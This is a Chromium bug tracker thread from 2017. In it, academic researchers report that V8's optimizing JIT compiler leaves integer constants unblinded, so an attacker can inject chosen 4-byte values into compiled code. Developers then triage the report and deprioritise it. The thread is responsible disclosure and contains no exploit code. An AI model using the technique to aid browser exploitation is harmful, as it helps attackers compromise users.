Security: Nonblinded Constants in Optimizing JS Compiler
Reported by
gimais...@gmail.com,
Feb 23 2017
|
|||||||
Issue descriptionVULNERABILITY DETAILS We, academic researchers from Saarland University, Germany, have checked the completeness of constant blinding schemes in modern browsers, including Chrome. Our goal was to see if there are still non-blinded integer constants emitted in native code. In Chrome, we found that JIT code, generated by the optimizing compiler, mostly contains non-blinded integer constants. This means that adversaries are able to inject arbitrary 4 byte values into JIT-compiled code, which constitutes a security risk and weakens the security guarantees of constant blinding. VERSION Chrome Version: 56.0.2924.87 stable. Operating System: Windows 10, 1607. The study was conducted on Chrome 50 in Windows 10, but is still applicable to current version across different OSes. REPRODUCTION CASE Attached, see the HTML file, containing a simple JavaScript code that will inject eight 4-byte values sequentially in JIT-compiled code. ###### Although it seems like the decision of not blinding integer constants in optimizing compiler is deliberate, we still wanted to give you a heads-up of our findings. Our work was accepted at the NDSS Symposium, and will be presented there on Feb 28, 2017. In the attachment, you can also find our academic paper on this topic. Best regards, Giorgi Maisuradze
,
Feb 24 2017
thx for the heads-up!
,
Mar 2 2017
,
Mar 14 2017
Issue 698944 has been merged into this issue.
,
Mar 14 2017
Severity medium because another flaw is required to take advantage of this. My recollection was that V8 had in the past taken steps to try to avoid this, unclear if this is a regression.
,
Mar 14 2017
palmer@ and jochen@ are on this from the security side. We've known that crankshaft regressed this since it originally landed. However, we finally closed that original crankshaft bug because the switch to just turbofan landed. So, with the pending removal of crankshaft, the plan is to fix this in turbofan.
,
Mar 15 2017
jarin: Uh oh! This issue still open and hasn't been updated in the last 19 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Mar 15 2017
,
Mar 30 2017
jarin: Uh oh! This issue still open and hasn't been updated in the last 34 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
May 2 2017
Friendly ping from security sheriff. jarin/jochen, is there any update here?
,
May 5 2017
Removing this from the security bug queue, since: - this isn't a vulnerability itself, but something that could aid exploitation - jit pages are rwx anyway right now, making this less useful - the paper is public |
|||||||
►
Sign in to add a comment |
|||||||
Comment 1 by palmer@chromium.org
, Feb 24 2017Components: Blink>JavaScript>Compiler
Labels: OS-Android OS-Chrome OS-Linux OS-Mac OS-Windows
Owner: jochen@chromium.org
Status: Assigned (was: Unconfirmed)